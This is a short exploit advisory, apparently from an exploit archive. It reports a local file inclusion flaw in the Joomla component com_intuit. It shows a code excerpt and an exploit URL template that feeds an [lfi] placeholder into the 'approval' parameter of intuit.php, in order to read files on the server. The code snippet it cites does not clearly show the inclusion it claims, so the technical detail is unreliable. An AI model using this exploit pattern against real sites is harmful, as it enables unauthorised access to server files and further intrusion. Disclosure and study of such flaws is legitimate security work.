id: 10462
date: 12/27/2009
title: Joomla Component com_intuit LFI Vulnerability
author: Fl0riX
cves: 

=============================================
Joomla Component com_intuit LFI Vulnerability
=============================================

[++] Joomla Component com_intuit Local File Inclusion Vulnerability
 
[++] Author     : Fl0riX
 
[++] Special Thanks : Deep-Power , PyskE And All Friends
 
***************************************************************************************************************
[++] ERR0R CODE:
if ($response["approval"] != "")
  {
   //print_r($intuit_fields['succ_msg2']['g_value']);
****************************************************************************************************************
[++] exploit:
 
[++] http://server/component/com_intuit/models/intuit.php?approval=[lfi]
 
**************************************************************



#  0day.today [2023-03-23]  #